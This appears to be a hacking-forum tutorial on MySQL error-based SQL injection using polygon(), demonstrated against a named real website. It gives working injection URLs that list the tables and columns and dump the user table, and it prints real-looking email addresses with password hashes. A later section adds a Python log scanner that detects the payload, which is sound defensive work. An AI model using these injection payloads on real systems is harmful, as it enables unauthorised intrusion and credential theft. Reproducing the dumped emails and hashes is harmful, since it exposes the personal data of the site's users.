~~~::::Benzi Tutorials::::~~~~
Maybe some of you heard, or maybe not, but there's a new type of error-based injection in MySQL,
discovered about a week ago.
The dude who discovered it is called spari, who happens to be a dear friend of mine.
Let's start.
This method is based on the function polygon().
In a nutshell, this function constructs a geometry collection.
The vulnerable thing about it is that it only works with the function point().
for example-
Code:
SELECT polygon(point(53,12));
Not really exciting, eh?
For those who know a bit of geometry, it goes like point(x,y).
Now look what happens when we don't use point()-
Code:
SELECT polygon(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing
We get an error on our x argument, 53.
So let's think a bit.
If the error returns our string input as a string output, what would happen if we try to run a query?
Code:
SELECT polygon((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing
Boom! 5.5.38-35.2.
Now let's try that on a real site-
Conditions:
mysql_error on.
Let's get the version-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))
5.1.73-log
Nice, but can we extract more?
Hell yeah.
We will be using this to get the tables-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))
blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmessages,pernodnews,pernodpolls,pernodtopics,pernoduser
I'm interested in the table pernoduser, let's get the columns-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))
pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted
And dump the table-
Code:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))
and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.uk:795b087b2ceb3482dc9956eb8f126ea3
And we get the data.
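From the defender's side, the tell-tale sign of this technique in web server logs is a geometry constructor such as polygon() wrapped around a SELECT in a request parameter. The following scanner is an added example, not code from the tutorial; the log lines are constructed, and the inclusion of geometry functions other than polygon() is an assumption, not something the tutorial demonstrates.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (not from the tutorial): one benign request,
# one carrying the polygon()-wrapped subquery, one URL-encoded variant of it.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /users/view.php?id=42 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2025:10:00:01 +0000] "GET /users/view.php?id=polygon((select*from(select*from(select@@version)f)x)) HTTP/1.1" 500 233
10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /users/view.php?id=polygon%28%28select%2Afrom%28select%2Afrom%28select%20group_concat%28table_name%29%20from%20information_schema.tables%29f%29x%29%29 HTTP/1.1" 500 301
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Signature of the technique: a geometry constructor immediately wrapping a SELECT.
# Constructors other than polygon() are listed on the assumption they error the same way.
GEOM_SUBQUERY_RE = re.compile(
    r'\b(polygon|multipoint|linestring|multipolygon|geometrycollection)\s*\(\s*\(*\s*select\b',
    re.I,
)

def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL encoding so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url: str):
    """Return [(param, decoded_value)] for query parameters matching the signature."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = fully_decode(value)
        if GEOM_SUBQUERY_RE.search(value):
            hits.append((name, value))
    return hits

def scan_access_log(text: str):
    """Return [(line_no, param, decoded_value)] for every request in the log that matches."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            for name, value in suspicious_params(m.group(1)):
                findings.append((n, name, value))
    return findings
```

A legitimate polygon(point(...)) call does not match, since the pattern requires a SELECT directly inside the constructor's parentheses.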
To get around the results being cut off, we can just add a condition at the end, " where email>last-email ".
Hope you learned something.